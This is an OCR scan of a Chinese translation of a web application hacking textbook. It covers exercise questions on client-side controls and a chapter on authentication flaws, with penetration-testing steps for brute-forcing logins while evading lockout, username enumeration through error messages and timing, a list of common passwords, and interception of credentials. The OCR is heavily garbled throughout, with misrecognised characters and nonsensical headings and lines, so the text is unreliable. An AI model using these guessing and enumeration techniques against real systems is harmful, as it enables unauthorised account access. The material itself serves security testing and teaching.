件 。 束 算是 应 用 程序 对 客户 端 数据 和 操作 进行 模糊 处 理 ， 著 意 破 坏 的 
攻击 者 仍然 能 够 突破 这 些 防御 。 

如 采 确 定 任何 通过 客户 器 传 送 的 数据 ， 或 确认 客户 端正 在 执行 用 
尸 提 交 的 输入 ， 应 该 测试 服务 器 如 何 应 对 避 开 那些 控件 的 意外 数据 。 
许多 时 候 ， 由 于 应 用 程序 认为 客户 端 执行 的 防御 能 够 为 其 提供 保护 ， 
因而 面临 重大 威胁 。 


5.6 [A 


欲 知 问题 答案 ， 请 访问 http://mdsec.net/wahh ° 
(1) 通过 客户 端 传送 的 数据 如 何 阻止 破坏 性 攻击 ? 
(2) 应 用 程序 开发 者 希望 阻止 攻击 者 对 登录 功能 发 动 蛮 力 攻击 。 
由 于 攻击 者 可 能 以 多 个 用 户 名 为 目标 ， 开 发 者 决定 将 登录 尝试 失 败 次 
数 保存 在 一 个 加 密 cookie 中 ， 阻 止 任何 失败 次 数 超过 5 次 的 请 求 。 有 什 
么 办 法 能 够 避 开 这 种 防御 ? 
(3) 某 一 应 用 程序 包含 一 个 执行 严格 访问 控件 的 管理 页 面 。 该 页 
面 上 有 一 个 连接 到 另 一 台 Web 服 务 需 的 诊断 功能 链接 ， 只 有 管理 员 能 
够 访问 这 些 功能 。 不 执行 另 一 种 验证 机 制 ， 下 列 哪 一 种 (如 果 有 的 
话 ) 客户 端 机 制 可 用 于 为 诊断 功能 提供 安全 的 访问 控件 ? 要 选择 一 个 
解决 方案 ， 还 需要 了 解 其 他 信息 吗 ? 
(a) 诊断 功能 能 够 检查 HTTP Referer 消 息 头 ， 证 实 请 求 由 主 
管理 页 面 提交 © 
(b) 诊断 功能 能 够 验证 收 到 的 cookie， 证 实 其 中 包含 访问 主 
应 用 程序 所 需 的 有 效 会 话 令 牌 。 
(c) 主 应 用 程序 可 在 请 求 中 的 一 个 隐藏 字段 中 设置 一 个 验证 
We 。 诊断 功能 能 够 确认 这 一 点 ， 证 实用 户 在 主 应 用 程序 中 有 一 
DAH 
(4) 如 果 一 个 表单 字段 的 属性 为 disabled=true， 那 么 它 就 不 会 和 
表单 的 其 他 内 容 一 起 提交 。 如 何 才 能 改变 这 种 情况 呢 ? 
(5) 应 用 程序 可 采取 什么 方法 确保 客户 端 执 行 了 输入 确认 ? 


(1) 本 书 中 文 版 《IDA Pro 权 威 指南 〈 第 2 版 ) 》 已 由 人 民 邮 电 出 版 社 出 
版 ， 读 者 可 登录 图 灵 社 区 (ituring.com.cn) 本 书页 面 查看 相关 信息 。 
一 一 编者 注 


第 6 章 
valle 


从 概念 上 讲 ， 验 证 机 制 是 Web 应 用 程序 所 有 安全 机 制 中 最 简单 的 
一 种 机 制 。 通 常 ， 应 从 用 程序 必须 核实 用 户 提交 的 用 户 名 和 密码 正确 
与 否 。 如 果 正 确 ， 就 介 许 用 户 登录 ， 否 则 就 禁止 用 户 登 录 。 

验证 机 制 也 是 应 用 程序 防御 恶意 攻击 的 中 心机 制 。 它 处 在 防御 未 
授权 访问 的 最 前 沿 ， 如 果 用 户 能 够 突破 那些 防御 ， 他 们 通常 能 够 控制 
应 用 程序 的 全 部 功能 ， 自 由 访问 其 中 保存 的 数据 。 缺 乏 安全 稳定 的 验 
证 机 制 ， 其 他 核心 安全 机 制 (如 会 话 管理 和 访问 控制 ) 都 无 法 有 效 实 
施 。 

设计 一 个 安全 的 验证 机 制 看 似 简单 ， 实 际 上 却 是 一 件 极其 麻烦 的 
事情 。 在 现实 世界 中 ，Web 应 用 程序 验证 机 制 通常 是 最 薄弱 的 环节 ， 
由 此 攻击 者 能 够 获得 未 授权 访问 。 我 们 曾 见 过 无 数 应 用 程序 由 于 验证 
机 制 存在 各 种 缺陷 而 被 攻破 的 实例 。 

本 章 将 详细 介绍 困扰 Web 应 用 程序 的 大 量 设计 和 执行 缺陷 。 这 些 
缺陷 之 所 以 存在 ， 主 要 是 因为 应 用 程序 设计 者 和 开发 者 无 法 回答 一 个 
简单 的 问题 ， 攻 击 者 针对 验证 机 制 实施 攻击 能 够 实现 什么 目标 ? 在 绝 
大 多 数 情况 下 ， 只 要 认真 分 析 一 下 某 个 应 用 程序 ， 就 可 以 发 现 许 多 潜 
在 的 漏洞 ， 其 中 任何 一 个 都 足以 破坏 应 用 程序 。 

许多 最 常见 的 验证 漏洞 实际 上 极其 简单 。 任 何人 都 可 以 在 登录 表 
单 中 输入 字典 中 的 单词 ， 试 图 猜测 有 效 的 密码 。 另 外 ， 应 用 程序 中 也 
隐藏 着 一 些 细微 的 缺陷 ， 只 有 对 复杂 的 多 阶段 登录 机 制 进行 仔细 分 析 
后 才能 发 现 它们 并 对 其 加 以 利用 。 本 章 将 全 面 描述 这 些 攻击 ， 包 括 那 
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6.1 验证 技术 
当 执 行 验证 机 制 时 ，Web 应 用 程序 开发 者 可 以 采用 各 种 不 同 的 技 


口 基于 HTML 表 单 的 验证 ; 

口 多 元 机 制 ， 如 组 合 型 密码 和 物理 令 牌 ; 

口 客户 端 SSL 证 书 或 智能 卡 ; 

口 HTTP 基 本 和 摘要 验证 ; 

口 使 用 NTLM 或 Kerberos 整 合 Windows 的 验证 ; 

a 验证 服务 。 

到 目前 为 止 ， Web 应 用 程序 中 最 常用 的 验证 机 制 是 使 用 HTML 表 
单 获取 用 尸 名 和 和 密码， 并 将 它们 提交 给 应 用 程序 。 因 特 网 上 90% 以 上 
的 应 用 程序 都 采用 这 种 机 制 。 

在 更 加 注重 安全 的 因特网 应 用 程序 (如 电子 银行 ) 中 ， 这 种 基本 
的 机 制 通常 扩展 到 几 个 阶段 ， 要 求 用 户 提 区 其 他 证 书 ， 如 PIN 号 码 或 
从 机 密 字 中 选择 的 字符 。HTML 表 单 仍 主要 用 于 获取 相关 数据 。 

最 为 注重 安全 的 应 用 程序 (如 为 进行 巨额 交易 的 个 人 提供 服务 的 
私人 银行 ) 通常 采用 使 用 物理 令 牌 的 多 元 机 制 。 这 些 令 牌 通常 产生 一 
组 一 次 性 口令 ， 或 者 基于 应 用 程序 指定 的 输入 执行 一 个 质询 - 啊 应 功 
能 。 随 着 这 种 技术 的 成 本 日 渐 降 低 ， 可 能 会 有 更 多 应 用 程序 采用 这 种 
机 制 。 但 是 ， 许 多 这 类 解决 方案 实际 上 无 法 解决 它们 则 在 解决 的 威 
胁 ， 主 要 是 钓鱼 攻击 和 使 用 客户 端木 马 的 威胁 。 

一 些 Web 应 用 程序 使 用 客户 端 $SSL 证 书 或 在 智能 卡 中 执行 加 密 机 
制 。 但 是 ， 由 于 管理 和 分 配 这 些 项 目的 成 本 非常 高 晶 ， 通 党 只 有 那些 
用 户 不 多 的 安全 极其 重要 的 应 用 程序 才 会 使 用 它们 。 

因特网 上 的 应 用 程序 很 少 使 用 基于 HTTP 的 验证 机 制 (EA ` 
和 整合 Windows 的 机 制 ) ， 企 业内 联网 更 常 采用 这 种 机 制 。 这 时 ， 组 
织 内 部 用 户 提 供 标 准 的 网 络 或 域 证 书 ， 应 用 程序 通过 以 上 一 种 技术 对 
其 进行 处 理 ， 再 允许 用 户 访问 企业 应 用 程序 。 

一 些 应 用 程序 还 采用 Microsoft Passport 之 类 的 第 三 方 验证 服务 ， 
但 暂时 这 种 机 制 尚 未 得 到 大 量 使 用 。 

大 多 数 与 验证 有 关 的 漏洞 和 攻击 适用 于 上 面 提 到 的 任何 一 种 技 
术 。 由 于 绝 大 多 数 应 用 程序 普遍 采用 基于 HTML 表 单 的 验证 ， 我 们 将 


描述 每 一 种 与 其 有 关 的 特殊 凋 洞 和 攻击 ， 以 及 与 其 他 可 用 技术 有 关 的 
主要 差异 和 攻击 方法 。 


6.2 wie Wr 


与 Web 应 用 程序 常用 的 任何 其 他 安全 机 制 相 比 ， 验 证 功能 中 存在 
着 更 多 设计 方面 的 薄弱 环节 。 即 使 在 基于 用 户 名 和 密码 验证 用 户 这 种 
丰 这 简单 的 标准 化 模型 中 ， 其 中 包含 的 设计 多 也 容易 叶 到 应 用 程 
被 非法 访问 。 


6.2.1 í tt EAD 


许多 Web 应 用 程序 没有 或 很 少 对 用 户 密 码 的 强度 进行 控制 。 应 用 
程序 彰 帝 使 用 下 列 形式 的 密码 : 

口 非常 短 或 空 日 的 密码 ; 

口 以 第 用 的 字典 词汇 或 名 称 为 密码 ; 

口 密 码 和 用 户 名 完全 相同 ; 

口 仍然 使 用 默认 密码 。 

图 6-1 是 一 个 实施 脆弱 密码 强度 规则 的 实例 。 通 第 ， 终 病 用 户 很 少 
具有 安全 意识 。 因 此 ， 没 有 实施 严格 密码 标准 的 应 用 程序 很 可 能 包含 
大 量 使 用 脆弱 密码 的 用 户 账 户 。 攻 击 者 很 容易 就 可 猜测 出 这 些 密码 ， 
从 而 对 应 用 程序 进行 未 授权 访问 。 
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图 6-1 -个 实施 脆弱 密码 强度 规则 的 应 用 程序 


渗透 测试 步骤 


设法 得 明 任何 与 密码 强度 有 关 的 规则 。 

(1) 浏览 该 Web 站 点 ， 查 找 任何 描述 上 述 规则 的 内 容 。 

(2) 如 果 可 以 进行 自我 注册 ， 用 不 同 种 类 的 脆弱 密码 注册 几 
个 账户 ， 了 解 应 用 程序 采用 何 种 规则 。 

(3) 如 果 拥 有 一 个 账户 并 且 可 以 更 改 密码 ， 试 着 把 密码 更 改 
为 各 种 脆弱 密码 。 


Ex 注解 ”如 果 应 用 程序 仅 通过 客户 端 控件 实施 密码 强度 规 


i. 这 本 身 并 不 是 一 个 安全 问题 ， 因 为 普通 用 户 仍然 受到 保护 。 虽 
然 诡计 多 端的 攻击 者 可 为 目 己 分 配 脆弱 密码 ， 但 这 通常 并 不 会 给 应 
用 程序 造成 威胁 。 


尝试 访问 


http://mdsec.net/auth/217/ 


6.2.2 BA Wits 


登录 功能 的 公开 性 往往 诱 使 攻击 者 试图 猜测 用 户 名 和 密码 ， 从 而 
获得 未 授权 访问 应 用 程序 的 权力 。 如 采 应 用 程序 允许 攻击 者 使 用 不 同 
的 密码 重复 进行 登录 演 试 ， 直 到 找到 正确 的 密码 ， 那 么 它 惑 非常 容易 
遭受 攻击 ， 因 为 即使 是 业余 攻击 者 也 可 以 在 浏 充 硕 中 手动 输入 一 些 常 
见 的 用 户 名 和 密码 。 

最 近 一 些 知名 站 扣 沦 陷 ， 成 和 十 上 万 个 现实 世界 中 的 密码 也 随 之 洪 
漏 ， 这 些 密 码 或 者 以 明文 形式 存储 ， 或 者 使 用 可 蛋 力 攻击 的 散 列 存 
储 。 现 实 世 界 中 的 一 些 最 常见 的 密码 如 下 所 示 : 

DQ password 
口 网 站 名 称 
口 12345678 
g qwerty 

g abc123 

o 111111 

D monkey 
g 12345 

g letmein 


T 注解 管理 员 密码 实际 上 比 密码 策略 允许 的 更 为 脆弱 。 它 


们 可 能 在 实施 密码 策略 之 前 就 已 设置 ， 或 者 通过 其 他 应 用 程序 或 界 
面 设置 。 


在 这 种 情况 下 ， 精 明 的 攻击 者 会 根据 见长 的 常用 密码 列表 ， 使 用 
目 动 技巧 笑 试 猜测 出 密码 。 依 赖 今天 的 市 完 和 处 理 能 力 ， 通 过 普通 PC 


和 DSL 连 接 ， 攻 击 者 每 分 钟 束 可 以 发 出 数 千 个 登录 壬 试 。 这 样 ， 即 使 
最 强大 的 密码 最 终 也 会 被 攻破 。 

我 们 将 在 第 14 章 详细 描述 实施 臂力 登录 的 各 种 目 动 技巧 和 工具 。 
使 用 Burp Intruder 对 一 个 账户 成 功 实施 密码 猜测 攻击 的 过 程 如 图 6-2 所 
示 “。 我 们 可 通过 HTTP 员 应 码 、 啊 应 长 度 及 缺乏 “登录 错误 ”请 恩 等 考 异 
清楚 区 分 成 功 的 登录 壬 试 。 


intruder attack 3 Sion =x 
attack save columns 
Filter: showing all item 
fesuits target positions | payioads opbons 
[request paload | staus | error imeo.. lengh | comment 
|9306 peas Swot? 302 | 43 | i= 
0 | 200 | 1610 baseline request 
1 Agaaaa 200 | 1510 
|2 Abcdef 200 | 1610 
3 ADcoetg 200 1510 
4 Acton 200 | | 1610 
Adidas 200 1510 
Admin 200 | 1510 
ACrwnisTatve 200 1510 ~ 
request response 
ow pa t ox 
OST / aut lé/Def lt.ashx ETTP/1.1 < 
Host: misec.net 
Tontent-Type: application, x-www—form-urlencoded 


-ontent-Length: J4 
Tamnection: clese 


usernam“nesahiépassvord-pass¥ 


0 matches 


图 6-2 ALD SCT RAS Fe Bo A Bl 


— HED. FRE A ne BE eS o PMH, FEN DY 
用 程序 可 能 会 设置 cookie failedlogins = 1， 如 果 登 录 尝 试 失 败 ， 递 增 这 
个 值 。 达 到 某 个 上 限 后 ， 服 务 右 将 在 提交 的 cookie 中 检测 这 个 值 ， 并 
拒绝 处 理 登 录 壬 试 。 这 种 客户 端 防御 可 防止 仅 使 用 浏览 絮 实 施 的 手动 
攻击 ， 但 如 第 5 章 所 述 ， 这 种 防御 可 轻易 避 开 。 

如 采 登 录 失 败 计数 亏 保 存在 当前 会 话 中 ， 这 时 惑 会 出 现 前 一 个 漏 
洞 的 变化 形式 。 虽 然 在 客户 端 并 没有 表明 该 漏洞 存在 的 任何 迹象 ， 但 
攻击 者 只 需要 获得 一 个 全 新 的 会 话 (例如 ， 通 过 保留 会 话 cookie) 即 
可 继续 实施 密码 猜测 攻击 。 


最 后 ， 在 某 些 情况 下 ， 应 用 程序 会 在 失败 的 登录 笑 试 达到 一 定 次 
数 后 锁定 目标 账户 。 但 是 ， 它 会 通过 表明 《或 允许 攻击 者 推测 ) 所 提 
区 的 密码 是 否 正确 的 消 奶 ， 对 随后 的 登录 等 试 作出 啊 应 。 这 意味 着 ， 
即使 目标 账户 被 锁定 ， 攻 击 者 仍然 可 以 完成 密码 猜测 攻击 。 如 采 应 用 
程序 在 一 段 时 间 后 目 动 解除 账户 的 锁定 状态 ， 则 攻击 者 只 需要 等 到 这 
一 时 刻 ， 然 后 即 可 使 用 发 现 的 密码 正常 登录 。 


渗透 测试 步骤 


(1) 用 控制 的 某 个 账户 手动 提交 几 个 错误 的 登录 党 试 ， 监 控 
接收 到 的 错误 消息 。 

(2) 如果 应 用 程序 在 大 约 10 次 登录 失败 后 还 没有 返回 任何 有 
关 账 户 锁定 (account lockout) 的 消息 ， 再 党 试 正 确 登录 。 如 果 登 录 
成 功 ， 应 用 程序 可 能 并 未 采用 任何 账户 锁定 策略 。 

(3) 如 果 账 户 被 锁定 ， 可 以 笠 试 重复 使 用 不 同 的 账户 。 如 果 
应 用 程序 发 布 任何 cookie， 这 次 可 以 将 每 个 cookie 仅 用 于 一 次 登录 尝 
itt, FFARR AEC RS IR AGH cookie 。 

(4) 此 外 ， 如 果 账 户 被 锁定 ， 应 查看 与 提交 无 效 密码 相 比 ， 
提交 有 效 密码 是 否 会 导致 应 用 程序 的 行为 出 现任 何 差 异 。 如 果 了 确实 
如 此 ， 则 可 以 继续 实施 密码 猜测 攻击 ， 即 使 账户 被 锁定 。 

(5) 如 果 没 有 控制 任何 账户 ， 尝 试 枚 举 一 个 有 效 的 用 户 名 
o THERE HEA LIRR IRS, PES IRR EY 
BRIBE °? 

(6) 发 动 蛮 力 攻击 前 ， 首 先 确 定 应 用 程序 响应 成 功 与 失败 登 
以 此 分 清 它 们 在 自动 攻击 过 程 中 表现 出 的 区 
All ° 

(7) 列 出 已 枚 举 出 的 或 常见 的 用 户 名 列表 和 常用 密码 列表 。 
根据 所 获得 的 任何 有 关 密 码 强 度 规则 的 信息 对 上 述 列 表 加 以 修改 ， 
以 避免 进行 多 余 测 试 。 

(8) 使 用 这 些 用 户 名 和 密码 的 各 种 排列 组 合 ， 通 过 适当 的 工 
具 或 定制 脚本 迅速 生成 登录 请 求 。 监 控 服 务 絮 啊 应 以 确定 成 功 的 登 
录 壬 试 。 我 们 将 在 第 14 章 详细 说 明 使 用 自动 化 方法 实施 定制 攻击 的 
各 种 技巧 和 工具 。 

(9) 如 果 一 次 针对 几 个 用 户 和 名， 通常 最 好 以 广度 优先 

(breadth-first) 而 非 深 度 优 先 (depth-first) 的 方式 实施 这 种 亦 力 攻 
击 。 这 包括 循环 使 用 一 组 密码 (从 最 常用 的 密码 开始 ) 并 轮流 对 每 
个 用 户 名 使 用 每 一 个 密码 。 这 种 方法 有 两 方面 的 好 处 : 首先， 可 以 
更 加 迅速 地 确定 使 用 常用 密码 的 账户 ; 其 次 ， 这 样 做 可 以 降低 触发 


任何 账户 锁定 防御 的 可 能 性 ， 因 为 在 使 用 同一 个 账户 进行 连续 登录 
之 间 存 在 时 间 延 迟 。 


尝试 访问 


http://mdsec.net/auth/16/ 
http://mdsec.net/auth/32/ 
http://mdsec.net/auth/46/ 
http://mdsec.net/auth/49/ 


6.2.3 详细 的 失败 消息 


一 个 典型 的 登录 表单 要 求 用 户 输入 两 组 信息 〈 用 户 名 和 密码 ) ， 
ee eet 
fg) 。 

如 果 登 录 尝 试 失败， 当然 可 以 得 出 结论 : 至 少 有 一 组 信息 出 错 。 
但 是 ， 如 果 应 用 程序 通知 是 哪 一 组 信息 无 效 ， 就 可 以 利用 它 显 著 降 低 
登录 机 制 的 防御 效能 。 

在 最 简单 的 情况 下 ， 如 果 只 需要 用 户 名 和 密码 登录 ， 应 用 程序 可 
能 会 通过 指出 失败 的 原因 (用 户 名 无 效 或 密码 错误 ) 来 啊 应 失败 的 登 
隶 尝试 ， 如 图 6-3 所 示 。 


Username: dəf Username: zzz 
Password: Login Password: Login 
Password iS incorrect. User is not recognised, 


图 6-3 ”详细 的 登录 失败 消息 指出 已 猜测 册 有 效 的 用 户 扣 


在 这 种 情况 下 ， 攻 击 者 可 以 发 动 一 次 目 动 化 攻击 ， 抽 历 大 量 常见 
的 用 户 名 ， 确 定 哪些 有 效 。 当 然 ， 用 户 名 一 般 并 非 秘密 例如， 登录 
时 并 不 隐藏 用 户 名 ) 。 但 是 ， 如 采 攻 击 者 能 够 轻易 确定 有 效 的 用 户 
名 ， 束 更 可 能 在 有 限 的 时 间 内 、 运 用 一 定 的 技能 、 付 出 一 定 的 精力 攻 
破 应 用 程序 ， 并 将 枚 举 出 的 用 户 名 列表 作为 随后 各 种 攻击 的 基础 ， 包 
括 密 码 猜 测 、 攻 击 用 户 数据 或 会 话 ， 或 者 社会 工程 [。 


除 主要 的 登录 功能 外 ， 还 可 以 对 验证 机 制 的 其 他 组 件 进 行 用 户 名 
枚 举 。 理 论 上 ， 需 要 提交 真实 或 潜在 用 户 名 的 任何 功能 都 可 用 于 这 一 
目的 。 例 如 ， 通 党 都 可 以 对 用 户 注册 功能 进行 用 户 名 枚 举 。 如 有 应 用 
程序 允许 新 用 户 注 册 并 指定 他 们 目 己 的 用 户 名 ， 由 于 应 用 程序 需要 防 
止 注册 重复 用 户 名 ， 在 这 种 情况 下 ， 几 乎 不 可 能 阻止 用 户 名 枚 举 攻 
击 。 如 本 章 后 面部 分 所 述 ， 有 时 也 可 以 对 密码 修改 或 坪 记 密码 功能 进 
IT a AE 


TZ 注解 许多 验证 机 制 以 隐 仿 或 明确 的 方式 提示 用 户 名 。 根 
据 设 计 常 识 ，Web 邮 件 账户 的 用 户 名 通常 为 电子 邮件 地 址 。 许 多 其 


他 站 点 在 应 用 程序 中 透露 用 户 名 ， 或 者 允许 使 用 可 轻易 猜测 出 的 用 
户 名 (如 user1842，User1843 等 ) ， 并 未 考虑 攻击 者 会 对 其 加 以 利 
用 的 情况 。 


在 更 复杂 的 登录 机 制 中 ， 应 用 程序 要 求 用 户 提交 儿 组 信息 ， 或 者 
完成 儿 个 步 又。 这 时 ， 详 细 的 失败 消 轧 或 老 异 点 可 帮助 攻击 者 轮流 针 
对 登 孙 过程 的 每 个 阶段 发 动 攻 击 ， 提 高 其 获得 未 授权 访问 的 可 能 性 。 


TZ 注解 这 种 漏洞 可 能 会 以 更 隐 含 的 形式 出 现 。 即 使 响应 有 


效 和 无 效用 户 名 的 错误 消息 表面 看 来 完全 相同 ， 它 们 之 间 仍 然 存 在 
细微 的 差别 ， 可 用 于 枚 举 有 歼 的 用 户 名 。 例 如 ， 如 果 应 用 程序 中 的 
多 条 代码 路 径 返 回 “ 相 同 的 ”失败 消息 ， 这 些 消息 之 间 仍 然 可 能 存在 
细小 的 排版 差异 。 有 些 时 候 ， 应 用 程序 啊 应 在 屏幕 上 显示 的 内 容 完 
全 相同 ， 但 其 HTML 源 代码 可 能 隐 藏 着 细微 的 区 别 ， 如 注释 或 布局 
方面 的 不 同 。 如 果 无 法 轻易 枚 举 出 有 效 的 用 户 名 ， 应 当 仔细 比较 应 
用 程序 对 有 效 和 无 将 用户 名 作出 的 啊 应 。 

可 以 使 用 Burp Suite 中 的 “比较 ”(Comparer) 工具 自动 分 析 并 突 
出 显示 两 个 应 用 程序 啊 应 之 间 的 差异 ， 如 图 6-4 所 示 。 这 有 助 于 迅速 
BRE A EF 是 否 会 导致 应 用 程序 的 响应 出 现任 何 系统 性 的 差 
Fo 


Leng: 1,591 
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图 6-4 使 用 Burp Suite 人 确定 应 用 程序 响应 的 细微 差别 


12} 


Ll smc views 


渗透 测试 步骤 


(1) 如 果 已 经 知道 一 个 有 效 的 用 户 名 (例如 一 个 受 控制 的 账 
户 ) ， 使 用 这 个 用 户 名 和 一 个 错误 的 密码 进行 一 次 登录 ， 然 后 使 用 
一 个 完全 随机 的 用 户 名 进行 另 一 次 登录 。 

(2) 记录 服务 器 响应 两 次 登录 尝试 的 每 一 个 细节 ， 包 括 状态 
码 、 任 何 重 定 辣 、 屏 幕 上 显示 的 信息 以 及 任何 隐藏 在 HTML 页 面 中 
Reig sates 


| (3) 努力 找 出 服务 器 响应 两 次 登录 尝试 的 任何 明显 或 细微 的 

Ze FF ° 

(4) 如 果 无 法 发 现任 何 差异 ， 在 应 用 程序 中 任何 提交 用 户 名 
〈 例 如 自我 注册 、 BIER Rice ee) 重复 上 述 操 

(5) 如 果 发 现 服务 咒 响 应 有 效 和 无 效用 户 名 之 间 的 差异 ， 收 
集 一 个 常见 用 户 名 列表 并 使 用 一 个 定制 脚本 或 自动 工具 迅速 提 区 每 
ee 

(6) 开始 枚 举 操作 之 前 ， 请 确定 应 用 程序 是 否 在 登录 党 试 失 
败 次 数 达 到 一 定数 目 后 执行 账户 锁定 〈 请 参阅 6.2.2 节 ) 。 如 果 应 用 
程序 执行 账户 锁定 ， 最 好 在 设计 枚 举 攻 击 时 记 住 这 一 点 。 例 如 ， 如 
果 应 用 程序 只 允许 登录 某 个 账户 时 失败 3 次 ， 可 能 就 会 在 使 用 通过 
自动 枚 举 发 现 的 每 个 用 户 名 登录 时 “浪费 ”一 次 登录 机 会 。 因 此 ， 当 
进行 枚 举 攻击 时 ， 不 要 在 每 次 登录 时 提交 完全 不 合理 的 密码 ， 而 是 
提 区 利 见 的 密码 ， 如 password1 或 以 用 户 名 为 密码 。 如 果 应 用 程序 执 
行 脆弱 的 密码 强度 规则 ， 在 枚 举 操 作 过 程 中 执行 的 一 些 登 录 党 斌 就 
很 可 能 会 取得 成 功 ， 有 些 情况 下 还 可 能 同时 查 明 用 户 名 和 和 密码。 要 
以 用 户 名 设置 密码 字段 ， 可 以 使 用 Burp Intrude 冲 的 “ 破 城 
he” (battering ram) 攻击 模式 ， 在 登录 请 求 的 几 个 位 置 插入 相同 的 
ABUT ° 


即使 应 用 程序 对 包含 有 效 与 无 效用 户 名 登录 党 试 的 啊 应 完全 相 
同 ， 我 们 仍然 可 以 根据 应 用 程序 响应 登录 请 求 的 时 间 枚 举 出 用 户 名 。 
应 用 程序 通常 依据 登录 请 求 是 否 包 含有 效用 户 名 ， 对 其 进行 截然 不 同 
的 后 端 处 理 。 例 如 ， 如 果 登 录 请 求 中 包含 一 个 有 效 的 用 户 名 ， 应 用 程 
序 可 能 会 从 后 端 数据 库 中 获取 用 户 资料 ， 对 这 些 资料 进行 各 种 处 理 
(如 检查 账户 是 否 到 期 ) ， 然 后 确认 密码 (可 能 使 用 一 个 资源 密集 型 
散 列 算法 ) ， 如 果 密 人 码 错 误 返 回 一 条 常规 消息 。 仅 仅 使 用 浏览 器 可 能 
无 法 检测 出 应 用 程序 处 理 两 个 请 求 之 间 的 时 间 差 异 ， 但 自动 工具 能 够 
区 分 这 种 差异 。 即 使 这 种 操作 会 产生 大 量 错误 警报 ， 但 100 个 用 户 名 约 
50% 的 有 效率 仍然 要 强 于 10 000 个 用 户 名 仅 0.5% 的 有 效率 。 第 15 章 将 
详细 讨论 如 何 检测 并 利用 这 种 时 间 差 异 从 应 用 程序 中 提取 信息 。 


YV 提示 ” 除 登 录 功 能 外 ， 我 们 还 可 以 从 其 他 地 方 获取 有 效 的 
用 户 名 。 检 查 在 应 用 程序 解析 过 程 中 (请 参阅 第 4 章 了 解 相关 内 


容 ) 发 现 的 所 有 源 代 码 注释 ， 确 定 所 有 明显 的 用 户 名 。 开 发 者 或 组 
织 内 部 内 其 他 人 员 的 电子 邮件 地 址 都 可 能 为 有 效 的 用 户 名 ;任何 可 
访问 的 日 志 功能 也 可 能 透露 用 户 名 。 


尝试 访问 


http://mdsec.net/auth/53/ 


http://mdsec.net/auth/59/ 
http://mdsec.net/auth/70/ 
http://mdsec.net/auth/81/ 
http: //mdsec.net/auth/167/ 


6.2.4 WEE 受 攻击 


如 果 应 用 程序 使 用 非 加 密 的 HTTP 连 接 传输 登录 证 书 ， 处 于 网 络 适 
当 位 置 的 镭 听 者 当然 就 能 够 拦截 这 些 证 书 。 根 据 用 户 的 位 置 ， 礼 听 者 
可 能 位 于 : 
口 用 户 的 本 地 网 络 中 
口 用 户 的 IT 部 门 内 ; 
口 用 户 的 ISP 内 ; 
口 因特网 骨干 网 上 ; 
o 托管 应 用 程序 的 ISP 内 ; 
口 管理 应 用 程序 的 IT 部 门 内 。 


T 注解 上 壕 任 何 一 个 位 置 可 能 由 授权 用 户 占用 ， 也 可 能 
通过 其 他 方法 攻破 相关 基础 架构 的 外 部 攻击 者 占用 。 即 使 某 一 特定 


中 间 媒 介 可 人 和信， 最 好 还 是 使 用 安全 的 传输 机 制 传 送 敏 感 数 
Ha 


即使 是 通过 HTTPS 登 录 ， 如 果 应 用 程序 处 理 证 书 的 方式 并 不 安 
全 ， 证 书 仍 有 可 能 被 泄露 给 未 授权 方 。 


口 如 果 以 查询 字符 串 参 数 、 而 不 是 在 POST 请 求 主 体 中 传送 证 书 ， 
TPS Hs Bb A Be SALLE BD, PIQUA RPA ot ash ids ` Web 
服务 器 日 志 内 以 及 主机 基础 染 构 采用 的 任何 反问 代理 中 。 如 果 攻 击 者 
成 功 攻破 这 些 资源 ， 就 能 够 获取 保存 在 这 些 地 方 的 用 户 证 书 ， 从 而 提 
升 其 访问 权限 。 

口 虽 然 大 多 数 Web 应 用 程序 确实 使 用 POST 请 求 主体 提交 HTML 登 
录 表 单 ， 但 令 人 奇怪 的 是 ， 应 用 程序 常常 通过 重 定 问 到 一 个 不 同 的 
URL 来 处 理 登 录 请 求 ， 而 以 查询 字符 串 参 数 的 形式 提交 证 书 。 我 们 并 
不 清楚 应 用 程序 开发 者 为 何 采 用 这 种 方法 ， 但 以 连接 一 个 URL 的 302 重 
定 癌 执 行 请 求 ， 比 使 用 男 一 个 通过 JavaScript 提 交 的 HTML 表 单 提 出 
POST 请 求 要 容易 得 多 。 

口 Web 应 用 程序 有 时 将 用 户 证 书 保存 在 cookie 中 ， 通 常 是 为 了 执行 
设计 不 佳 的 登录 、 密 码 修改 、“ 记 住 我 ”等 机 制 。 攻 击 考 通过 攻击 用 户 
cookie 即 可 获取 这 些 证 书 。 如 果 cookie 相 对 安全 可 靠 ， 可 通过 访问 客户 
端的 本 地 文件 系统 获得 它们 。 即 使 证 书 被 加 密 ， 攻 击 者 仍然 不 需要 用 
户 证 书 就 可 以 通过 重新 传送 cookie 实 施 登 录 。 第 12 章 和 第 13 章 将 接 壕 
攻击 者 如 何 通 过 各 种 方法 获取 其 他 用 户 的 cookie 。 

许多 应 用 程序 对 应 用 程序 中 未 经 验证 的 区 域 使 用 HTTP， 而 在 登录 
时 转 而 使 用 HTTPS。 如果 是 这 样 ， 应 在 向 浏 贤 絮 加 载 登录 页 面 时 转换 
到 HITTPS， 使 得 用 户 能 够 在 输入 证 书 前 核实 页 面 是 否 真实 可 信 。 但 
是 ， 一些 应 用 程序 通常 使 用 HTTP 加 载 登录 页 面 ， 而 在 提交 证 书 时 才 转 
换 到 HTTPS。 这 样 做 是 不 安全 的 ， 因 为 用 户 不 能 核实 登录 页 面 的 真实 
性 ， 因 此 无 法 保证 安全 提交 证 书 。 那 么 ， 处 在 适当 位 置 的 攻击 者 就 可 
以 拦截 并 修改 登录 页 面 ， 更 改 登录 表单 的 目标 URL 以 使 用 HTTP。 等 到 
精明 的 用 户 意 识 到 证 书 已 使 用 HTTP 提 交 时 ， 攻 击 者 已 成 功 获取 这 些 证 
书 o 


渗透 测试 步骤 


(1) 进行 一 次 成 功 登 录 ， 监 控 客 户 端 与 服务 器 之 间 的 所 有 来 


(0) 


(2) 确定 在 来 回 方向 传输 证 书 的 每 一 种 情况 。 可 以 在 拦截 代 
理 服务 器 中 设置 拦截 规则 ， 标 记 包 含 特殊 字符 囊 的 消息 (请 参阅 第 
20 章 了 解 相关 内 容 ) 。 

(3) 如 果 发 现 通 过 URL 查 询 字符 捉 或 者 以 cookie 的 方式 提交 证 
书 ， 或 者 由 服务 器 向 客户 端 传输 证 书 的 任何 情况 ， 了 解 传输 的 一 切 


细 市 并 设法 弄 清 应 用 程序 开发 者 这 样 做 的 目的 。 设 法 查 明 攻击 者 干 
扰 应 用 程序 逻辑 以 获取 其 他 用 户 证 书 的 各 种 手段 。 

(4) 如 果 通 过 非 加 密 渠 道 传输 任何 敏感 信息 ， 这 样 做 当然 容 

